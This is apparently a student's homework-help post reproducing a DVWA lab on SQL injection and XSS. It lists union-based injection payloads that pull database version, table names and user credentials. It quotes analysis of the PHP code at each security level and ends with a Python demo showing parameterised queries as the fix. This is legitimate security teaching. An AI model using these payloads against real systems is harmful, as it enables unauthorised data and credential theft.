Question
I need help with these network security questions; please answer your own version. Below are the instructions.
“Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.”
TASK 1. Set up and prepare to use DVWA
* Use DVWA running in Metasploitable (simplest)
OR
* Use the DVWA Live CD (go to https://github.com/ethicalhack3r/DVWA and scroll to the Download section to find "DVWA LiveCD - Download ISO") and boot from it on any virtual machine. (Connect the ISO to the CDROM on the VM and check the LiveCD option so you can easily boot from the CD rather than the image. This method can even work with a new VM that has no OS installed.)
Optionally, install and run DVWA from your Kali Linux (seek instructions elsewhere). The DVWA user is admin; the password is “password”.
Set the VM network to bridged and check that the cable is connected in the advanced configuration. View IP addresses and ping between your host and the VM.
After Metasploitable or the LiveCD boots you’ll see a $ prompt.
Use ifconfig to find the system IP address.
From the host computer’s browser load http:///dvwa/login.php and log in with
[admin/password]
Read as much of the information about DVWA as time allows;
Select Setup and [Create / Reset Database] — you should see success messages;
Select DVWA Security — to change the security level to low.
TASK 2. SQL Injection
(From the menu options on the left side of the screen, select SQL Injection)
Set Security level to low
A. Select the SQL Injection button and you will be presented with a User ID: entry form. In the input box try simply typing 1 and note the results. (Experiment to see if you can find other details.)
Try %' or '0'='0 (note the results. What do you think the underlying SQL statement is? For example, SELECT first_name, . . . ).
Try 1' or 0=0 union select null, version() # (results?).
Try the following and see if additional information can be gathered from this database:
1. 1' or 0=0 union select null, user() #
2. 1' or 0=0 union select null, database() #
3. 1' and 1=0 union select null, table_name from information_schema.tables #
4. %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
5. %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
6. 1' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
B. Set Security level to medium
Change the DVWA Security level to medium and try a few of these experiments again to see whether these attacks might still reveal information. Try removing the single quote after the initial character.
If we look under the hood at the code in medium it looks like this:
$id = $_GET['id'];
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
(The following insights are from http://www.securityclown.com/dvwa-sql-injection/ : The improvements are in a new function mysql_real_escape_string($id); “What does mysql_real_escape_string($id); do? According to http://php.net/manual/en/function.mysql-real-escape-string.php it “prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.”
It prepends a backslash, “\”, to the list of characters, which causes them to be escaped from their normal value or meaning. For example, in most scripting languages, if we have the string mystring = "Hello "World"!" a typical interpreter will throw an error because of the nested quotes. However, if we change the string to mystring = "Hello \"World\"!" most interpreters will escape the quotes with the backslash prepending them and the quotes will then be considered part of the string (and the backslashes will be excluded). So if you were to print the value of mystring = "Hello \"World\"!" to a console, the output would be Hello "World"!.
What does this mean for us? Well, not much. mysql_real_escape_string() is ancient and doesn’t do nearly enough to slow down an attacker (by itself anyway). There’s plenty we can do without using null bytes, new lines (and it doesn’t escape 0x0a), or quotes.
We can remove the single quote from 1' in our queries and almost everything still works fine.” )
C. Set Security level to high
Let’s cheat and take a peek at the code:
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)) {
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    // remainder of the handler is not shown on this page
}
(Insights from http://www.securityclown.com/dvwa-sql-injection/:
“Right away we can see two changes. First is the additional function stripslashes($id); and second is the condition if (is_numeric($id)) {.
First let’s take a look at stripslashes($id);. As the name would imply, stripslashes() strips away backslashes found in a string passed to it (though in the case of double backslashes “\\” only one is stripped, leaving “\”). A reference to this function can be found at http://php.net/manual/en/function.stripslashes.php. This function is also ancient, and doesn’t do much in terms of offering any security.
And now let’s look at the conditional if (is_numeric($id)) {. Here the code is checking the value of $id and making sure that it is a number with the is_numeric() function. If it’s a number, the query is submitted; if not, no dice.
So what’s vulnerable? Nothing. It’s not vulnerable to SQL injection anyway.”)
TASK 3. Cross Site Scripting (XSS)
Connect to DVWA on the VM from the host as you did earlier. Select the XSS button and follow the final link to cgisecurity.com and read as much of the info as you have time for.
Follow the examples provided in Chandel, “XSS Exploitation in DVWA (Bypass All Security).pdf”.
Q1. Why does %' or '0'='0 work against the user login form?
Q2. Why do any of these attacks work against this database form?
Q3. When you changed the security level from low to medium, were you still able to get any information using SQL Injection?
Q4. As an ethical hacker, when you discover that an exposed database is vulnerable, what should you do with that information?
Q5. Write your own definition of XSS.
Q6. Can high security be bypassed with both SQL Injection and XSS? Explain.
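The three DVWA security levels quoted above (low: raw concatenation; medium: escaping only; high: numeric check) can be reproduced offline to see exactly why escaping alone does not stop the `1 or 0=0` variant and why binding the value as a parameter does. The following is an added example, not DVWA's PHP and not code from the lab or from securityclown.com: it uses Python's sqlite3 module as a stand-in for PHP/MySQL, a constructed three-row users table, and quote doubling (SQLite's form) as an approximation of the quote escaping that mysql_real_escape_string() performs; the function names lookup_low/lookup_medium/lookup_high/lookup_param are assumptions chosen for this example.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not DVWA's real data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, user_id):
    """'Low' pattern: the request value is pasted straight into the SQL text.

    A quote inside user_id closes the string literal and whatever follows is
    parsed as SQL, which is why %' or '0'='0 returns every row instead of one.
    """
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def escape_quotes(value):
    """Approximation of the quote escaping done by mysql_real_escape_string().

    SQLite escapes a single quote by doubling it rather than with a backslash;
    the effect on the lookups below is the same.
    """
    return value.replace("'", "''")


def lookup_medium(conn, user_id):
    """'Medium' pattern: quotes are escaped, but the value is used unquoted.

    Escaping only neutralises quote characters. A payload with no quote, such
    as 1 or 0=0, is untouched by it and is still parsed as SQL.
    """
    sql = (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id = {escape_quotes(user_id)}"
    )
    return conn.execute(sql).fetchall()


def lookup_param(conn, user_id):
    """Parameterised query: the driver binds the value as data, never as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_high(conn, user_id):
    """'High' pattern: accept only a plain integer, then bind it as a parameter.

    str.isdigit() stands in for PHP's is_numeric(); anything else is refused
    before a query is built at all.
    """
    if not user_id.isdigit():
        return []
    return lookup_param(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    print("low,    id=1            ->", lookup_low(db, "1"))
    print("low,    id=%' or '0'='0 ->", lookup_low(db, "%' or '0'='0"))
    print("medium, id=1 or 0=0     ->", lookup_medium(db, "1 or 0=0"))
    print("high,   id=1 or 0=0     ->", lookup_high(db, "1 or 0=0"))
    print("param,  id=%' or '0'='0 ->", lookup_param(db, "%' or '0'='0"))
```

Running it shows the low lookup returning all three rows for the `%' or '0'='0` input, the medium lookup still returning all three rows for the quote-free `1 or 0=0` input (the single-quote variant becomes a syntax error once escaped, matching the "remove the single quote" hint in task B), and both the numeric allow-list and the bound parameter returning only the requested row or nothing. The durable fix is the parameterised query; the numeric check is an additional, narrower guard that only works because this particular field is an integer.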